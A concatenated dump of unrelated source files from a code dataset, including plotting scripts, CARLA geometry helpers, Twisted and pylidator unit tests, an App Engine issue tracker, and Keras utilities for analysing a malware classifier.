float(f.readline().split(',')[-2])\n if len(s)==2:\n data[model][timeout.index(int(s[1]))] = score\n else:\n data[model] = [score]*len(timeout)\n exact_ans = score\n\ndata['timeout'] = timeout\ndf = pd.DataFrame(data)\ndf = df.set_index('timeout')\nfor alg in df:\n df[alg] = (df[alg] - exact_ans)/math.log(2)\ndf.plot(style=['-^','-o','-s', '-v'])\nplt.xticks(timeout)\nplt.yticks(range(-14,2,2))\nplt.xlabel('Timeout(seconds)')\nplt.ylabel('Log(Z)')\nplt.ylim(min(df.min())-1, 
max(df.max())+1)\nplt.legend()\nplt.show()\n","sub_path":"pysrc/drawtimeout.py","file_name":"drawtimeout.py","file_ext":"py","file_size_in_byte":979,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"4493587","text":"import math\nimport numpy as np\n\nfrom collections import defaultdict\n\n\n\ndef xu(u, v_u, x0, hdg):\n beta = hdg + math.atan2(v_u,u)\n x = x0 + math.sqrt(u**2 + v_u**2) * math.cos(beta)\n return x\n\ndef yu(u, v_u, y0, hdg):\n beta = hdg + math.atan2(v_u,u)\n y = y0 + math.sqrt(u**2 + v_u**2) * math.sin(beta)\n return y\n\ndef linepoint(s, x, y, hdg, length):\n fxu = lambda u: xu(u, 0, x, hdg)\n fyu = lambda u: yu(u, 0, y, hdg)\n \n return fxu(length), -fyu(length) # minus sign convention in carla\n\ndef arcpoint(s, x, y, hdg, curvature, length):\n \n ulocal = lambda l: np.sin((l)*curvature)/curvature\n vlocal = lambda l: np.cos((l)*curvature)/curvature - 1/curvature\n \n fxl = lambda l: xu(ulocal(l), vlocal(l), x, hdg)\n fyl = lambda l: yu(ulocal(l), vlocal(l), y, hdg)\n\n return fxl(length), -fyl(length) # minus sign convention in carla\n \ndef parapoly(s, a, b, c, d):\n s = float(s)\n a = float(a)\n b = float(b)\n c = float(c)\n d = float(d)\n return lambda u: a + b*(u-s) + c*(u-s)**2 + d*(u-s)**3\n\nclass parapoly3:\n def __init__(self, s, e, a, b, c, d):\n self.s = float(s)\n self.e = float(e)\n self.a = float(a)\n self.b = float(b)\n self.c= float(c)\n self.d = float(d)\n\n self.poly = parapoly(s, a, b, c, d)\n\n def __call__(self, u):\n if (self.s <= u and u <= self.e):\n return self.poly(u)\n else:\n return None\n\n def __add__(self, other):\n s = self.s\n e = self.e\n a = self.a + other.a\n b = self.b + other.b\n c = self.c + other.c\n d = self.d + other.d\n return parapoly3(s, e, a, b, c, d)\n\n def mult(self, num):\n s = self.s\n e = self.e\n a = self.a * num\n b = self.b * num\n c = self.c * num\n d = self.d * num\n return parapoly3(s, e, a, b, c, d)\n\nclass parapolylinks:\n def __init__(self, precedings = [], parapolys = []):\n self.precedings = precedings.copy()\n self.parapolys = parapolys.copy()\n\n def __call__(self, u, cumulative=True):\n ans = 0\n for pre in self.precedings:\n ans += pre(u, False)\n for poly in self.parapolys:\n val = poly(u)\n if val is not None:\n if cumulative:\n return val + ans\n return val\n if cumulative:\n return ans\n return 0\n\n def swidth(self, u):\n ans = 0\n for pre in self.precedings:\n ans += pre(u, False)\n return ans\n\n def ewidth(self, u):\n return self.__call__(u)\n\n\n\n\ndef gdictpoint(gdict, length):\n x = gdict['x']\n y = gdict['y']\n hdg = gdict['hdg']\n if (gdict['type'] == 'line'):\n return linepoint(0, x, y, hdg, length)\n else:\n curvature = gdict['curvature']\n return arcpoint(0, x, y, hdg, curvature, length)\n\n\n\ndef L2(x, y, road, u):\n rx, ry = road.getpoint(u)\n return (x - rx)**2 + (y - ry)**2\n\ndef ternarySearch(x, y, road):\n l=0\n r = road.length\n \n while (r - l > 0.2):\n p = 2.0/3.0 * l + 1.0/3.0 * r\n q = 1.0/3.0 * l + 2.0/3.0 * r\n l2p = L2(x, y, road, p)\n l2q = L2(x, y, road, q)\n if l2p < l2q:\n r = q\n else:\n l = p\n return (l + r)/2.0\n\ndef prdist(x, y, road):\n u = ternarySearch(x, y, road)\n l2 = L2(x, y, road, u)\n return math.sqrt(l2)\n\ndef prdist2(x, y, road, getu=False):\n u = ternarySearch(x, y, road)\n l2 = L2(x, y, road, u)\n \n \n rx0, ry0 = road.getpoint(u - 0.1)\n if (rx0 is None):\n rx0, ry0 = road.getpoint(u)\n \n rx1, ry1 = road.getpoint(u + 0.1)\n if (rx1 is None):\n rx1, ry1 = road.getpoint(u + 0.05)\n \n p = 
np.array([x, y, 0]) - np.array([rx0, ry0, 0])\n    du = np.array([rx1, ry1, 0]) - np.array([rx0, ry0, 0])\n    duxp = np.cross(du, p)\n    if getu:\n        return -math.sqrt(l2)*np.sign(duxp[-1]), u\n    return -math.sqrt(l2)*np.sign(duxp[-1])\n\n\n","sub_path":"carla/IMLAB_SelfDrivingCarla/local_lane_matching/geomodule.py","file_name":"geomodule.py","file_ext":"py","file_size_in_byte":4003,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"}
{"seq_id":"108943159","text":"from . import mockito\nfrom twisted.internet.defer import Deferred\nfrom twisted.python.failure import Failure\nfrom twisted.web.http_headers import Headers\nfrom launchkey_twisted.twisted_api import NoneBodyProducer, JSONResponseBodyParser\nfrom .api_test_base import TwistedAPITestBase\n\n\nclass TwistedAPIPingTest(TwistedAPITestBase):\n    \"\"\"\n    Tests for API ping\n\n    All tests that check the final result will have to process two instances of callback as the first call\n    will return a deferred that is waiting on its response, a deferred, to be called by the response body\n    processor\n    \"\"\"\n    def test_calls_request_with_get_method(self):\n        self._api.ping()\n        mockito.verify(self._agent).request('GET', mockito.any(), mockito.any(), mockito.any())\n\n    def test_calls_request_with_proper_uri(self):\n        self._api.ping()\n        expected = '{0}/{1}/ping'.format(self._api_host, self._version)\n        mockito.verify(self._agent).request(mockito.any(), expected, mockito.any(), mockito.any())\n\n    def test_calls_request_with_correct_headers(self):\n        expected = Headers({\n            'User-Agent': ['LaunchKey Twisted Client'],\n            'Accept-Type': ['application/json']\n        })\n        self._api.ping()\n        mockito.verify(self._agent).request(mockito.any(), mockito.any(), expected, mockito.any())\n\n    def test_calls_request_with_none_producer(self):\n        self._api.ping()\n        mockito.verify(self._agent).request(mockito.any(), mockito.any(), mockito.any(), mockito.any(NoneBodyProducer))\n\n    def test_returns_expected_deferred(self):\n        actual = self._api.ping()\n        self.assertIs(actual, self._agent_request_deferred)\n\n    def test_raises_correct_exception_for_non_json_response(self):\n        self._response.headers = Headers({'content-type': ['text/html']})\n        deferred = self._api.ping()\n        deferred.callback(self._response)\n        self.assertIsInstance(deferred.result, Failure,\n                              'Unexpected Deferred result. Expected {0} but was {1}'.format(\n                                  Failure.__name__, deferred.result.__class__.__name__))\n        self.assertIsInstance(deferred.result.value, Exception,\n                              'Unexpected Failure value. 
Expected {0} but was {1}'.format(\n Exception.__name__, deferred.result.value.__class__.__name__))\n self.assertEqual(str(deferred.result.value), 'Non JSON response from API received')\n\n def test_response_has_deferred_result_before_data_is_written(self):\n deferred = self._api.ping()\n deferred.callback(self._response)\n self.assertIsInstance(deferred.result, Deferred)\n\n def test_response_had_deliver_body_called_with_json_body_response_parser_using_request_deferred_result(\n self):\n deferred = self._api.ping()\n deferred.callback(self._response)\n mockito.verify(self._response).deliverBody(mockito.any(JSONResponseBodyParser))\n body_parser = mockito.getCallArgument(self._response, 'deliverBody')\n self.assertIs(body_parser.finished, self._agent_request_deferred.result)\n\n def test_response_callback_value_is_not_failure_when_error_not_returned_in_response(self):\n deferred = self._api.ping()\n deferred.callback(self._response)\n deferred.result.callback({'key': '', 'launchkey_time': '2015-01-01 00:00:00'})\n self.assertNotIsInstance(deferred.result, Failure)\n\n def test_response_callback_value_is_failure_when_error_is_returned_in_response(self):\n deferred = self._api.ping()\n deferred.callback(self._response)\n deferred.result.callback({'status_code': 500})\n self.assertIsInstance(deferred.result, Failure)\n\n def test_final_value_is_body_parsed_value(self):\n expected = {'key': 'expected', 'launchkey_time': '2015-01-01 00:00:00'}\n deferred = self._api.ping()\n deferred.callback(self._response)\n deferred.result.callback(expected)\n self.assertEquals(deferred.result, expected)\n\n def test_only_makes_one_agent_request_for_two_pings_with_no_force(self):\n expected = {'key': 'expected', 'launchkey_time': '2015-01-01 00:00:00'}\n deferred = self._api.ping()\n deferred.callback(self._response)\n deferred.result.callback(expected)\n\n self._api.ping()\n mockito.verify(self._agent).request(mockito.any(), mockito.any(), mockito.any(), mockito.any())\n\n def test_makes_two_agent_request_for_two_pings_with_force(self):\n expected = {'key': 'expected', 'launchkey_time': '2015-01-01 00:00:00'}\n deferred = self._api.ping(True)\n deferred.callback(self._response)\n deferred.result.callback(expected)\n\n self._api.ping(True)\n mockito.verify(self._agent, times=2).request(mockito.any(), mockito.any(), mockito.any(), mockito.any())\n\n def test_returns_deferred_with_result_having_same_value_on_second_call_for_two_pings_with_no_force(self):\n expected = {'key': 'expected', 'launchkey_time': '2015-01-01 00:00:00'}\n deferred = self._api.ping()\n deferred.callback(self._response)\n deferred.result.callback(expected)\n\n deferred = self._api.ping()\n self.assertIsInstance(deferred, Deferred)\n self.assertEquals(deferred.result, expected)\n","sub_path":"tests/tests/test_api_ping.py","file_name":"test_api_ping.py","file_ext":"py","file_size_in_byte":5334,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"259013923","text":"import psycopg2\nfrom pyiem.plot import MapPlot\nimport datetime\nimport pytz\nimport numpy as np\n\npgconn2 = psycopg2.connect(database='iem', host='iemdb', user='nobody')\ncursor2 = pgconn2.cursor()\n\ncursor2.execute(\"\"\"\n SELECT id, extract(year from day) as yr,\n sum(case when max_sknt >= (40. / 1.15) or max_gust >= (40. 
/ 1.15) then 1 else 0 end)\n    from summary s JOIN stations t on (t.iemid = s.iemid)\n    WHERE t.network in ('IA_ASOS', 'AWOS') and day < '2015-01-01'\n    and day > '2008-01-01'\n    GROUP by id, yr\n\"\"\")\nhits = {}\nfor row in cursor2:\n    stid = row[0]\n    if stid not in hits:\n        hits[stid] = []\n    hits[stid].append(row[2])\n\nfrom pyiem.network import Table as NetworkTable\n\nnt = NetworkTable(('IA_ASOS', 'AWOS'))\n\nvals = []\nlats = []\nlons = []\nfor station in hits:\n    lats.append(nt.sts[station]['lat'])\n    lons.append(nt.sts[station]['lon'])\n    vals.append(np.average(hits[station]))\n\nm = MapPlot(sector='iowa', axisbg='white',\n            title=\"Average Number of Days per Year with Peak Wind Gust over 40 MPH\",\n            subtitle=\"Based on IEM Archives of Iowa ASOS/AWOS Data (2008-2014)\")\nm.plot_values(lons, lats, vals, '%.1f')\nm.drawcounties()\nm.postprocess(filename='test.png')","sub_path":"scripts/feature/asos/map_values.py","file_name":"map_values.py","file_ext":"py","file_size_in_byte":1201,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"}
{"seq_id":"398956198","text":"from typing import List\n\n\nclass Solution:\n    def removeDuplicates(self, nums: List[int]) -> int:\n        # use a pointer to separate unique numbers\n        if not nums:\n            return 0\n        \n        i, j = 0, 0\n        while j < len(nums):\n            if nums[j] != nums[i]:\n                i+=1\n                nums[i], nums[j] = nums[j], nums[i]\n            j+=1\n        \n        return i+1","sub_path":"Bloomberg/remove_duplicates.py","file_name":"remove_duplicates.py","file_ext":"py","file_size_in_byte":379,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"}
{"seq_id":"462903838","text":"from IPython.display import display_html\nfrom textwrap import dedent\n\n\nclass JignaNotebook(object):\n    def __init__(self, port=9999):\n        self.server_thread = None\n        self.port = port\n        self._code_count = 0\n\n    def start_server(self):\n        from jigna.api import View\n        view = View(body_html='')\n        self.view = view\n        from threading import Thread\n        t = Thread(target=lambda: view.serve(port=self.port))\n        t.daemon = True\n        t.start()\n        self.server_thread = t\n\n    def add_models(self, **context):\n        self.view.update_context(**context)\n\n    def get_ipython_html(self, body_html):\n        server = \"localhost:%d\"%self.port\n        div_id = 'injected%d'%self._code_count\n        self._code_count += 1\n        src = dedent(\"\"\"\n        
\n {body_html}\n
\n \n \"\"\".format(div_id=div_id, body_html=body_html, server=server))\n return src\n\n def show(self, body_html, **context):\n if len(context) > 0:\n self.add_models(**context)\n return display_html(self.get_ipython_html(body_html), raw=True)\n\n\n\ndef main():\n from IPython.frontend.html.notebook.notebookapp import NotebookApp\n app = NotebookApp()\n app.initialize()\n app.start()\n\nif __name__ == '__main__':\n main()\nelse:\n jigna_nb = JignaNotebook()\n jigna_nb.start_server()\n show = jigna_nb.show\n","sub_path":"examples/notebook/jigna_notebook.py","file_name":"jigna_notebook.py","file_ext":"py","file_size_in_byte":2304,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"237185774","text":"#!/usr/bin/env python3\n\n# Copyright (c) Microsoft Corporation.\n# Licensed under the MIT License.\n\nimport os\nfrom setuptools import setup, find_packages\n\n\n# Pull out all dependencies in requirements.txt for the batchkit library only.\nrootdir = os.path.dirname(os.path.realpath(__file__))\nwith open(os.path.join(rootdir, 'requirements.txt')) as reqs:\n required = reqs.read().splitlines()\ndeps = []\ntoggle = False\nfor line in required:\n if \"### batchkit\" in line:\n toggle = True\n continue\n elif \"###\" in line:\n toggle = False\n elif len(line) > 0 and line[0] != \"#\" and toggle:\n deps.append(line)\n\n\n# Package specification for batchkit library.\nsetup(\n name='batchkit',\n version='0.9.0',\n author='Microsoft Azure',\n author_email='andwald@microsoft.com',\n url='https://github.com/microsoft/batch-processing-kit',\n packages=[\"batchkit\"],\n install_requires=deps,\n license=\"MIT\",\n scripts=[],\n)\n","sub_path":"setup_batchkit.py","file_name":"setup_batchkit.py","file_ext":"py","file_size_in_byte":954,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"13702792","text":"# encoding=utf-8\n\nimport logging\nimport os\nimport re\n\nfrom google.appengine.dist import use_library\nuse_library('django', '0.96')\n\nfrom django.utils import simplejson\nfrom google.appengine.api import users\nfrom google.appengine.ext import webapp\nfrom google.appengine.ext.webapp import template\n\nimport issues\nimport model\n\nDEFAULT_ACTION = 'table'\n\n\ndef parse_labels(labels):\n labels = list(set(re.split('[, ]+', labels)))\n return sorted([l for l in labels if l])\n\n\nclass Action:\n def __init__(self, rh):\n self.rh = rh\n\n def render(self, data):\n self.rh.render(self.template, data)\n\n\nclass SubmitAction(Action):\n template = 'submit.tpl'\n\n def get(self):\n issue = self.get_issue()\n if self.rh.request.get('labels'):\n issue.labels.append(self.rh.request.get('labels'))\n self.render({\n 'issue': issue,\n })\n\n def post(self):\n data = dict([(x, self.rh.request.get(x)) for x in self.rh.request.arguments()])\n if 'labels' in data:\n data['labels'] = parse_labels(data['labels'])\n if not data.get('id'):\n user = users.get_current_user()\n if user:\n data['author'] = user.email()\n issue = issues.update(data)\n self.rh.redirect(self.rh.request.path + '?action=' + DEFAULT_ACTION)\n #self.rh.redirect(self.rh.request.path + '?action=view&id=' + str(issue.id))\n\n def get_issue(self):\n issue = model.TrackerIssue()\n issue.labels = [ 'Open' ]\n user = users.get_current_user()\n if user is not None:\n issue.author = user\n issue.owner = user\n return issue\n\n\nclass EditAction(SubmitAction):\n template = 'edit.tpl'\n\n def get_issue(self):\n issue_id = int(self.rh.request.get('id'))\n 
issue = model.TrackerIssue.gql('WHERE id = :1', issue_id).get()\n if issue is None:\n raise Exception('Issue %u does not exist.' % issue_id)\n return issue\n\n\nclass ViewAction(Action):\n template = 'view.tpl'\n\n def get(self):\n issue_id = int(self.rh.request.get('id'))\n issue = issues.get_issue_by_id(issue_id)\n self.render({\n 'issue': issue,\n 'labels': sorted(issue.labels, key=lambda l: ('-' not in l, l.lower())),\n 'resolved': 'Closed' in issue.labels,\n 'comments': model.TrackerIssueComment.gql('WHERE issue_id = :1 ORDER BY date_created', issue_id).fetch(100),\n })\n\n\nclass CommentAction(Action):\n def post(self):\n labels = parse_labels(self.rh.request.get('labels'))\n\n for l in ('Open', 'Closed'):\n if l in labels:\n labels.remove(l)\n\n if self.rh.request.get('resolved'):\n labels.append('Closed')\n else:\n labels.append('Open')\n\n issue_id = int(self.rh.request.get('id', '0'))\n issues.add_comment(issue_id, users.get_current_user(), self.rh.request.get('text'), labels=labels)\n self.rh.redirect(self.rh.request.path + '?action=view&id=' + str(issue_id))\n\n\nclass ListAction(Action):\n template = 'list.tpl'\n\n def get(self):\n label = self.rh.request.get('label')\n issues_ = issues.find_issues(label, closed=self.rh.request.get('closed'))\n\n self.render({\n 'issues': issues_,\n 'filter': label,\n 'columns': self.get_columns(issues_),\n })\n\n def get_columns(self, issues):\n columns = []\n for issue in issues:\n for label in issue.labels:\n if '-' in label:\n k, v = label.split('-', 1)\n if k not in columns:\n columns.append(k)\n return sorted(columns)\n\n\nclass TableAction(ListAction):\n template = 'table.tpl'\n\n def get(self):\n label = self.rh.request.get('label')\n issues_ = sorted(issues.find_issues(label, closed=self.rh.request.get('closed')), key=lambda i: i.summary.lower())\n\n data = [\n { 'pri': '1', 'title': u'Важно и срочно', 'issues': [] },\n { 'pri': '2', 'title': u'Важно, не срочно', 'issues': [] },\n { 'pri': '3', 'title': u'Срочно, не важно', 'issues': [] },\n { 'pri': '4', 'title': u'Ни срочно, ни важно', 'issues': [] },\n ]\n for issue in issues_:\n pri = [int(l[4:]) for l in issue.labels if l.lower().startswith('pri-')][0]\n if pri >= 1 and pri <= 4:\n data[pri-1]['issues'].append(issue)\n\n self.render({\n 'filter': label,\n 'data': data,\n })\n\n\nclass ExportAction(Action):\n def get(self):\n data = issues.export_json(self.rh.request.get('label') or None)\n self.rh.reply(data)\n\n\nclass ImportAction(Action):\n template = 'import.tpl'\n\n def get(self):\n self.render({ })\n\n def post(self):\n data = simplejson.loads(self.rh.request.get('dump'))\n issues.import_all(data)\n self.rh.redirect(self.rh.request.path)\n\n\nclass ImportOneAction(Action):\n def post(self):\n issue = issues.update(simplejson.loads(self.rh.request.get('data')), create=True)\n logging.info('Issue %u imported.' 
% issue.id)\n\n\nclass FixPriorityAction(Action):\n    def get(self):\n        for issue in issues.find_issues():\n            labels = list(issue.labels)\n            issues.fix_priority_labels(issue)\n            if labels != issue.labels:\n                issue.put()\n\n\nclass Tracker(webapp.RequestHandler):\n    handlers = {\n        'comment': CommentAction,\n        'edit': EditAction,\n        'export': ExportAction,\n        'fixpriority': FixPriorityAction,\n        'import': ImportAction,\n        'import-one': ImportOneAction,\n        'list': ListAction,\n        'submit': SubmitAction,\n        'table': TableAction,\n        'view': ViewAction,\n    }\n\n    def get(self):\n        self.call('get')\n\n    def post(self):\n        self.call('post')\n\n    def call(self, method):\n        action = self.request.get('action', DEFAULT_ACTION)\n        if action in self.handlers:\n            getattr(self.handlers[action](self), method)()\n        else:\n            self.reply('Don\\'t know how to handle action \"%s\".' % action)\n\n    def render(self, template_name, data, content_type='text/html'):\n        data['path'] = self.request.path\n        data['user'] = users.get_current_user()\n        # logging.debug(u'Data for %s: %s' % (template_name, data))\n        filename = os.path.join(os.path.dirname(__file__), 'templates', template_name)\n        self.reply(template.render(filename, data), content_type=content_type)\n\n    def reply(self, content, content_type='text/plain', status=200):\n        self.response.headers['Content-Type'] = content_type + '; charset=utf-8'\n        self.response.out.write(content)\n\nhandlers = [\n    ('.*', Tracker),\n]\n","sub_path":"gaetracker/handlers.py","file_name":"handlers.py","file_ext":"py","file_size_in_byte":6884,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"}
{"seq_id":"578414353","text":"n = int(input())\ndata = []\nfor i in range(n):\n    xy = []\n    A = int(input())\n    for k in range(A):\n        xy.append(list(map(int,input().split())))\n    data.append([A,xy])\n\n\nmax_ = 0\nfor bit in range(1<0\n    # fx_1 = self.alpha1 * x * K.cast(x > self.theta, K.floatx()) * K.cast(x <= 0.0, K.floatx()) # for theta 0 and len(self.rule) >= 5):\n            return True\n        else:\n            return False\n\n\n    def SetPredy(self, predy):\n        self.predy = predy\n\n\n    def SplitNode(self, newpt):\n        pos = int(newpt / BIT)\n        val = newpt % BIT\n        selindex = np.where(self.dataset[:, pos] == val)[0]\n        if len(selindex) == 0:\n            return None\n        else:\n            newrule = self.rule.copy()\n            newrule.append(newpt)\n            newdataset = self.dataset[selindex].copy()\n            NewNode = RuleStructure(newdataset, newrule)\n            self.dataset = np.delete(self.dataset, selindex, axis=0)\n            self.size = len(self.dataset)\n            return NewNode\n\n    def __eq__(self, other):\n        return len(self.dataset) == len(other.dataset)\n\n    def __lt__(self, other):\n        return -len(self.dataset) < -len(other.dataset)\n\n\ndef ReadData(year = NowYear, IsTrain = True):\n    if year != 2019:\n        if IsTrain == True:\n            f = open(\"data\\\\\" + str(year) + \"\\\\train.pkl\", \"rb\")\n        else:\n            f = open(\"data\\\\\" + str(year) + \"\\\\test.pkl\", \"rb\")\n        data = pickle.load(f)\n        f.close()\n        x = data[0]\n        y = data[1]\n        return x, y\n    else:\n        if IsTrain == True:\n            x = np.load(\"../data/2019/x_train.npy\")\n            y = np.load(\"../data/2019/y_train.npy\")\n        else:\n            x = np.load(\"../data/2019/x_test.npy\")\n            y = np.load(\"../data/2019/y_test.npy\")\n        y = y.reshape([len(y)])\n        return x, y\n\ndef loadModel(year = NowYear, fileName = None):\n    if fileName == None:\n        model = load_model(\"../model/\" + str(year) + \"/MLP_model.h5\")\n    else:\n        model = load_model(\"../model/\" + fileName)\n    return model\n\n\ndef set_acpos(model, ac, index):\n    for i in range(len(ac)):\n        
model.layers[int(index[i])].set_ac(ac[i])\n return model\n\n\ndef getPuppetModel(modelname):\n m = load_model(modelname)\n model = keras.Sequential()\n\n model.add(Dense(50, input_shape=[FEANUMDIC[NowYear]], activation= None))\n model.layers[-1].set_weights(m.layers[0].get_weights())\n model.add(ActivePossible(ac = np.ones([50]))) #############1111111###############\n\n model.add(Dense(50, activation= None))\n model.layers[-1].set_weights(m.layers[3].get_weights())\n model.add(ActivePossible(ac=np.ones([50]))) #############1111111###############\n\n model.add(Dense(1, activation= None))\n model.layers[-1].set_weights(m.layers[6].get_weights())\n\n return model\n\n\ndef getAvailableFeature(year = NowYear):\n f = open(\"rawdata\\\\\" + str(year) + \"\\\\feature_tag.txt\", \"r\", encoding=\"utf8\")\n lines = f.readlines()\n namelist = [0 for _ in range(FEANUMDIC[NowYear])]\n for line in lines:\n for i in range(1, 10):\n if line[-i] == ':':\n break\n name = line[0: -i]\n num = int(line[-i + 1: len(line)])\n namelist[num] = name\n f.close()\n return set([2*i for i in range(len(namelist)) if namelist[i] != 0]).union([2*i+1 for i in range(len(namelist)) if namelist[i] != 0])\n\n\n\ndef getNameList(year = NowYear):\n f = open(\"rawdata\\\\\" + str(year) + \"\\\\feature_tag.txt\", \"r\", encoding=\"utf8\")\n lines = f.readlines()\n namelist = [0 for _ in range(FEANUMDIC[NowYear])]\n for line in lines:\n for i in range(1, 10):\n if line[-i] == ':':\n break\n name = line[0 : -i]\n num = int(line[-i+1 : len(line)])\n namelist[num] = name\n f.close()\n for i in range(FEANUMDIC[NowYear]):\n if namelist[i] == 0:\n namelist[i] = \"*******************************\"\n return namelist\n\n\ndef getActiveNode(lay_0, lay_3,seed):\n dataNum = len(seed)\n activationNode = np.zeros([dataNum, 100])\n activationNode[:, 0 : 50] = \\\n lay_0.predict(seed, batch_size= 20000).reshape(dataNum, 50)\n activationNode[:, 50 : 100] = \\\n lay_3.predict(seed, batch_size= 20000).reshape(dataNum, 50)\n return activationNode\n\n\ndef getActivateState(model, x):\n lay_0 = Model(inputs=model.input,\n outputs=model.layers[0].output)\n lay_3 = Model(inputs=model.input,\n outputs=model.layers[3].output)\n\n activationNode = getActiveNode(lay_0, lay_3, x)\n return activationNode\n\n\ndef calAcStateFromRule(nowrule, model, testNum = 300):\n data = np.random.randint(0, BIT, [testNum, FEANUMDIC[NowYear]])\n for r in nowrule:\n pos = int(r / BIT)\n val = r % BIT\n data[:, pos] = val\n acstate = getActivateState(model, data) > 0\n acstate = np.mean(acstate, axis=0)\n return acstate\n\n\ndef calContributionVec(puppetModel, activationPossible):\n activationPossible = activationPossible.reshape([2, 50])\n puppetModel = set_acpos(puppetModel, activationPossible, [1, 3, ])\n contribution = getGradient(puppetModel)\n return contribution[0]\n\n\ndef getGradient(puppetModel):\n output = puppetModel.output\n input = puppetModel.input\n gradients = K.gradients(output, input)[0]\n\n out = K.function([input], [gradients])\n x = np.zeros([1, FEANUMDIC[NowYear]])\n y = out([x])[0]\n return y\n\n\ndef calPredy(contributionVec, rule, puppetModel, mean_vec):\n base = np.zeros([1, FEANUMDIC[NowYear]])\n base = puppetModel.predict(base)\n y = np.sum(base)\n rulepos = []\n for r in rule:\n rulepos.append(int(r / BIT))\n\n for i in range(FEANUMDIC[NowYear]):\n if i not in rulepos and mean_vec[i] != 0:\n if contributionVec[i] < 0:\n y += (contributionVec[i] ) * mean_vec[i]\n else:\n y += (contributionVec[i] / BIT) * mean_vec[i]\n for r in rule:\n pos = int(r / 
BIT)\n val = r % BIT\n if val == 1:\n y += contributionVec[pos]\n # else:\n # y -= contributionVec[pos]\n return y\n\n\ndef PlotName(RuleSet):\n name = getNameList(year = 2011)\n for rule in RuleSet:\n for r in rule:\n print(name[r[0]], r[1])\n print(\"#######################\")\n return 0\n\n\ndef readRuleSetfromTXT(filename):\n RuleSet = []\n f = open(filename, 'r')\n StrSet = f.readlines()\n f.close()\n for strrule in StrSet:\n strrule = strrule[0:-2]\n rule = strrule.split(\" \")\n for i in range(len(rule)):\n rule[i] = int(rule[i])\n RuleSet.append(rule)\n NewRuleSet = []\n for rule in RuleSet:\n newrule = []\n for r in rule:\n newrule.append([int(r / BIT), r % BIT])\n NewRuleSet.append(newrule)\n return NewRuleSet\n\n\ndef ReadRuleSet(fileName):\n f = open(fileName, \"rb\")\n RuleSet = pickle.load(f)\n f.close()\n return RuleSet\n\n\n\n\ndef transferRuleSet(RuleSet):\n NewRuleSet = []\n for rule in RuleSet:\n newrule = []\n for r in rule:\n newrule.append([int(r / BIT), r % BIT])\n NewRuleSet.append(newrule)\n return NewRuleSet","sub_path":"submissions/functional/denas/Android_malware/Scripts/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":8695,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"126445673","text":"#!/usr/bin/env python\n# coding: utf-8\n\nimport pycurl\nimport StringIO\nimport time\n\nfrom pymongo import Connection\nfrom gridfs import GridFS\n\ndef img2db(img, content_type, filename, timestamp):\n db = Connection().gridfs\n fs = GridFS(db)\n oid = fs.put(img, content_type = content_type, filename = filename, timestamp= timestamp)\n return oid\n\ndef GetImg2db(filename, url):\n try:\n crl = pycurl.Curl()\n crl.setopt(pycurl.HTTPGET, 1)\n crl.setopt(pycurl.URL, url)\n data = StringIO.StringIO()\n crl.setopt(pycurl.WRITEFUNCTION, data.write)\n crl.perform()\n img = data.getvalue()\n content_type = crl.getinfo(pycurl.CONTENT_TYPE)\n oid = img2db(img, content_type, filename, int(time.time()))\n return oid\n except:\n\t pass\n\n#url = \"http://thumbnail.image.rakuten.co.jp/@0_mall/pierrot/cabinet/img14/a1203-031544_1.jpg\"\n#filename = \"501a460c41ab101fda561b23\"\n\n#print GetImg(filename, url)\n","sub_path":"module/getimg2db.py","file_name":"getimg2db.py","file_ext":"py","file_size_in_byte":963,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"289631596","text":"import unittest\n\nimport pylidator\nfrom pylidator.exceptions import ContextNotAvailableError\n\nfrom functools import wraps\n\n\ndef child_generator(obj):\n for row in obj.children:\n yield row\n\n\nclass TestObj(object):\n def __init__(self, returns):\n self.it_happened = False\n self.returns = returns\n self.children = []\n\n\n@pylidator.validator(of=\"base_obj\")\ndef validate_parent(obj):\n obj.it_happened = True\n return obj.returns\n\n\n@pylidator.validator(of=\"child_obj\")\ndef validate_child(obj_child):\n obj_child.it_happened = True\n return obj_child.returns\n\n\n@pylidator.validator(of=\"base_obj\", requires=\"constants_service\")\ndef validate_parent_with_constants_service(obj_child, constants_service):\n obj_child.it_happened = True\n return obj_child.returns\n\n\nclass MyContext:\n pass\n\n\ndef _provide_base_obj(base_obj):\n yield base_obj, None\n\n\ndef _provide_child_obj(base_obj):\n for i, c in enumerate(base_obj.children):\n yield c, {\"description\": \"Child {}\".format(i)}\n\n\n_providers = {\"base_obj\": _provide_base_obj, \"child_obj\": 
_provide_child_obj}\n\n\nclass TestPylidator(unittest.TestCase):\n def test_validator_returns_None_results_in_no_error(self):\n data = TestObj(returns=None)\n ret = pylidator.validate(data, {pylidator.ERROR: [validate_parent]}, providers=_providers)\n\n self.assertTrue(data.it_happened)\n self.assertEqual([], ret.get_full_results())\n\n def test_validator_returns_string_results_in_error(self):\n data = TestObj(returns=\"failed.\")\n ret = pylidator.validate(data, {pylidator.ERROR: [validate_parent]}, providers=_providers)\n self.assertTrue(data.it_happened)\n self.assertEqual([{\"level\": \"ERROR\", \"message\": \"failed.\", \"validation_type\": None}], ret.get_full_results())\n\n def test_validator_returns_array_of_strings_results_in_errors(self):\n data = TestObj(returns=[\"error one\", \"error two\"])\n ret = pylidator.validate(data, {pylidator.ERROR: [validate_parent]}, providers=_providers)\n self.assertEqual(\n [\n {\"level\": \"ERROR\", \"message\": \"error one\", \"validation_type\": None},\n {\"level\": \"ERROR\", \"message\": \"error two\", \"validation_type\": None},\n ],\n ret.get_full_results(),\n )\n\n def test_child_validator_returns_string_results_in_error_per_child(self):\n data = TestObj(returns=\"who cares?\")\n\n data.children.append(TestObj(returns=\"hi\"))\n data.children.append(TestObj(returns=[\"there\", \"you\"]))\n data.children.append(TestObj(returns={\"field1\": [\"Error 1\", \"Error 2\"], \"field2\": \"Error 